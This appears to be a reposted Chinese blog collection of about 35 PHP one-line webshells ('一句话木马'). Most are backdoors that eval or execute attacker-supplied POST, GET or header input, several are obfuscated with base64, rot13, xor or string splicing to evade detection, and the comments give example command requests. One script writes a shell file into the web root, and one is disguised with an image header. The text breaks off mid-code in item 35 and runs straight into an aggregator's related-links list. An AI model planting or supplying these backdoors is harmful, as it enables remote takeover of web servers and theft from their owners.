PHP一句话木马集合

Posted 思源湖的鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP一句话木马集合相关的知识,希望对你有一定的参考价值。

前言

whoam1(QQ:2069698797)大佬早些年做的php一句话木马集合
在此记录下

1、eval.php

<?php @eval($_POST['cmd'])?>

2、assert.php

<?php assert($_POST[cmd]);?>

3、min_lenth.php

<?=`$_GET[1]`;//<?=`*`;

4、get_get.php

<?php
//?a=assert&b=phpinfo();
@$_GET[a](@$_GET[b]);
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
?>

5、get_post.php

<?php
//?2=system POST:1=whoami
//2=assert 1=phpinfo();
($_=@$_GET[2]).@$_($_POST[1])//?2=assert 1
?>

6、post_post.php

<?php
//a=assert&b=phpinfo();
//a=system&b=ipconfig
@$_POST['a'](@$_POST['b']);
//<O>a=assert</O>
?>

7、request_ab.php

<?php
//?a=system&b=dir
//?a=assert&b=phpinfo();
//?a=assert&b=eval($_POST['pass'])
//POST:
//  a=assert&b=phpinfo();
//  a=system&b=whoami
//GET:
//  http://127.0.0.1/fuckdun/yjh_2.php?a=assert&b=phpinfo();
//phpinfo(); == fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29;
//生成 c.php <?php @eval($_POST[c]);
$_REQUEST['a']($_REQUEST['b']);
?>

8、document-write.php

<?php
$root=$_SERVER['DOCUMENT_ROOT'];
$shelladdr=$root.'/shell.php';
$shellcontent='<?php@eval($_POST["cmd"]);?>';
file_put_contents($shelladdr,$shellcontent);
//http://127.0.0.1/write_shell.php?cmd=file_put_contents("a.txt","w");
//http://127.0.0.1/write_shell.php?cmd=fwrite(fopen("a.txt","w"),"aa");
//$a = @$_GET['cmd'];
//@eval($a);
?>

9、script.php

<script language="php">@eval($_POST['cmd']);</script>

10、include.php

<?php
$filename=$_GET['id'];
include($filename);
?>

11、require.php

<?php
if($_POST['token']=='xxoo'){
require'flag.png';//phpinfo();
}

12、stripslashes.php

<?php
$content=stripslashes($_POST[1]);
eval($content);
?>  

13、config.php

<?php
${"func"}=substr(__FILE__,-10,-4);
${"config"}=@$_GET[config];
@$func($config);

14、$_POST[cmd].php

<?php
${"function"}=substr(__FILE__,-15,-4);
${"config"}=assert;
$config($function);
//$func = @$_POST[cmd];
//assert($function);
//assert($_POST[cmd]);

15、hard_brute.php

<?php
//"shell" md5: 2591c98b70119fe624898b1e424b5e91
//substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['hihack']);
//var_dump(substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91');
//substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91'&&system('whoami');
substr(md5(@$_GET['x']),28)=='5e91'&&@eval($_POST['md5']);
?>

16、no_assert.php

<?
//${"function"}= substr(__FILE__, -14, -4);
$a=md5('ssss');
$b=substr($a,2,2)+37;
$s=$b+18;
$e=substr($a,-7,1);
$r=$s-1;
$t=$r+2;
$z=chr($b).chr($s).chr($s).$e.chr($r).chr($t);
$z($_GET['cmd']);
?>

17、accept_language.php

<?php
/*
Tamper Data 修改Accept-Language:whoami / ipconfig
 
import requests
 
URL = 'http://127.0.0.1/fuckdun/php-webshells-master/accept_language.php'
while True:
    command=raw_input("~$ ")
    head = {'Accept-Language':command}
    try:
        req = requests.get(URL,headers=head)
        print req.content
    except Exception as e: print e
 
*/
//echo passthru(@$_GET['a']);
//echo getenv("HTTP_ACCEPT_LANGUAGE");
echopassthru(getenv("HTTP_ACCEPT_LANGUAGE"));
?>

18、apply_filters.php

<?php
classParse_Args{
publicfunctionapply_filters($key){
    assert($key);
}
}
//?xxoo=phpinfo();
@extract($_REQUEST);
$reflectionMethod=newParse_Args();
$reflectionMethod->apply_filters($xxoo);
?>

19、create_function.php

<?php
//http://127.0.0.1/create_function.php?c=1;}phpinfo();/*
$id=@$_GET['c'];
$res='echo '.$id.'is'.$a.";";
$cf=create_function('$a',$res);
/*
function anonymous($a){
    echo 1;}phpinfo();/*.'is'.$a;
    //$id.'is'.$a;
}
anonymous($a);
*/
?>

20、invoke_cmd.php

<?php
$s=newReflectionFunction("assert");
@$s->invoke($_POST["cmd"]);
?>

21、array.php

<?php
item['wind']='assert';
$array[]=$item;
$array[0]['wind']($_POST['jssj'])
?>

22、array_flip.php

<?php        
$args=1;
$arr=array("n;}$_REQUEST[c];/*"=>"test");
$arr1=array_flip($arr);// array("test"=>"n;}$_REQUEST[c];/*");
//var_dump($arr1);die(); //array(1) { ["test"]=> string(15) "n;}phpinfo();/*" }
$arr2=$arr1[test];// n;}$_REQUEST[c];/*
//var_dump($arr2);die(); // string(15) "n;}phpinfo();/*"
create_function('$args',$arr2);// 1,n;}$_REQUEST[c];/

23、array_map.php

<?php
if($_GET[session]=='xxoo'){
    @array_map($_GET['xx'],(array)base64_decode($_REQUEST['oo']));
    exit();
}
//?session=xxoo&xx=assert
//post:oo=cGhwaW5mbygpOw==
?>

24、array_walk_base64.php

<?php
//http://127.0.0.1/fuckdun/yjh_10.php?_exit=cHJlZ19maWx0ZXI=
//POST: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$ad='|';$ad.='.';$ad.='*|';$ad.='e';
$_clasc=base64_decode(@$_GET['_exit']);//base64_decode($_REQUEST['_exit']); ->preg_replace 或preg_filter
$arr=array(base64_decode(@$_POST['mcontent'])=>$ad,);   //$arr = array('phpinfo()' => '|.*|e')
@array_walk($arr,$_clasc,'');   //preg_replace('|.*|e',phpinfo(),'')
 
/*
//www=preg_replace&wtf=phpinfo();
$e = $_REQUEST['www'];
$arr = array(@$_POST['wtf'] => '|.*|e',);
@array_walk($arr, $e, '')
 
//http://127.0.0.1/fuckdun/yjh_12.php?_exit=cHJlZ19yZXBsYWNl==
//post: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$Base = "base6"."4"."_decod"."e";
$_clasc = $Base(@$_REQUEST['_exit']);
$arr = array($Base(@$_POST['mcontent']) => '|.*|e',);
@array_walk($arr, $_clasc, '');
 
*/
?>

25、base64_assert.php

<?php  
error_reporting(0);
set_time_limit(0);
$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");
$a(@${"_P"."O"."S"."T"}[xw]);
?>

26、str_replace.php

<?php
$gn="J3Nhb3Nhb";
$alq="ydidKiTisg";
$obk="IEBldimFsIC";
$lub=str_replace("q","","qsqtqrq_replqace");
$cqs="gkX1BPU1Rb";
$hox=$lub("v","","vbasev6v4_vdvevcovdve");
$trx=$lub("ci","","ciccircieciacitcie_cifciucinciccitiocin");
$ots=$trx('',$hox($lub("i","",$obk.$cqs.$gn.$alq)));$ots();
/*
$uf="snc3"; //pass is sqzr
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw)));
$mpy();
*/
/*
$mt="mFsKCleRfU";
$ojj="IEBleldle";
$hsa="E9TVFsnd2VuJ10p";
$fnx="Ow==";
$zk = str_replace("d","","sdtdrd_redpdldadcde");
$ef = $zk("z", "", "zbazsze64_zdzeczodze");
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn");
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx)));
$zvm();
*/
?>

27、preg_replace.php

<?php@preg_replace("/[copyright]/e",$_POST['c'],"error");?>

28、preg_replace_post.php

<?php
//[@eval(base64_decode($_POST[z0])):smirk:
@$a=$_POST['x'];
if(isset($a)){
@preg_replace("/\\[(.*)\\]/e",'\\\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>

29、preg_replace_post_base64.php

<?php
//eval(base64_decode($_POST[z0]))
//POST: gbtv=a&z0=cGhwaW5mbygpOw== phpinfo();
//<O>gbtv=@eval_r($_POST[1])</O>
if(@$_POST['gbtv']){
$_="b"/**/."ase64_decode";
preg_replace("/^/e",$_("ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFt6MF0pKQ=="),0);
}
?>

30、preg_rot13.php

JFIF<?php  
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
?>

31、preg_rot13_post.php

<?php($b4dboy=$_POST['b4dboy'])&&@preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)','add');?>

32、assert_item.php

<?php
//?_=assert&__=eval($_POST['pass'])
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php${'_'.$_}['_'](${'_'.$_}['__']);?>

33、lambda.php

<?php
//function __lambda_func(){@eval($_POST['f']);}
$s="F9QivT1NUWyd";$v="QGivV2YivWwoJ";$j="mJ10pOw=iv=";
$re=str_replace("iv","","sivtr_ivrepivlaivce");
$ba=$re("nf","","bnfanfse6nf4_nfdecnfode");
$fun=$re("vf","","cvfreavfte_fvfunctvfion");
$vi=$fun("",$ba($re("iv","",$v.$s.$j)));$vi();?>

34、urldecode.php

<?php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
    $GuTou=str_replace(array("\\n","\\t","\\r"),"",$GuTou);
    $cc="";for($i=0;$i<strlen($GuTou);$i+=2)
    $cc.=urldecode("%".substr($GuTou,$i,2));
    @eval($cc);
    exit;
}
//Hex2phpinfo();gutou=706870696E666F28293B
//gutou=406576616C2028245F504F53545B2778275D293B&x=phpinfo();
//whoami:73797374656D2877686F616D69293B
/*
//http://127.0.0.1/222.php?cc=706870696E666F28293B     执行phpinfo()
//把phpinfo();转换成URL格式去掉%得706870696E666F28293B
//
//http://127.0.0.1/222.php?cc=406576616C2028245F504F53545B2778275D293B
//密码x
if(@$_REQUEST["cc"]){
   $c=@$_REQUEST["cc"];
   $c=str_replace(array("\\n","\\t","\\r"),"",$c);
   $buf="";for($i=0;$i<strlen($c);$i+=2)
   $buf.=urldecode("%".substr($c,$i,2));
   $FiLi=Create_Function("",$buf);$FiLi();exit;
}
*/
?>

35、xor.php

<?php
@$_++;
$__=("#"^"|");
$__.=("."^"~");
$__.=("/"^"`");
$__.=("|"^"/");
$__.=("{"以上是关于PHP一句话木马集合的主要内容,如果未能解决你的问题,请参考以下文章

php eval函数一句话木马代码

PHP之一句话木马

以下哪些是常见的php 一句话木马

PHP 一句话木马

网站中了一句话木马<?php file_put_contents('laobiao.php','<?php $FucKSafedogX=base64_decode

PHP的网站,怎么扫描出潜藏的一句话木马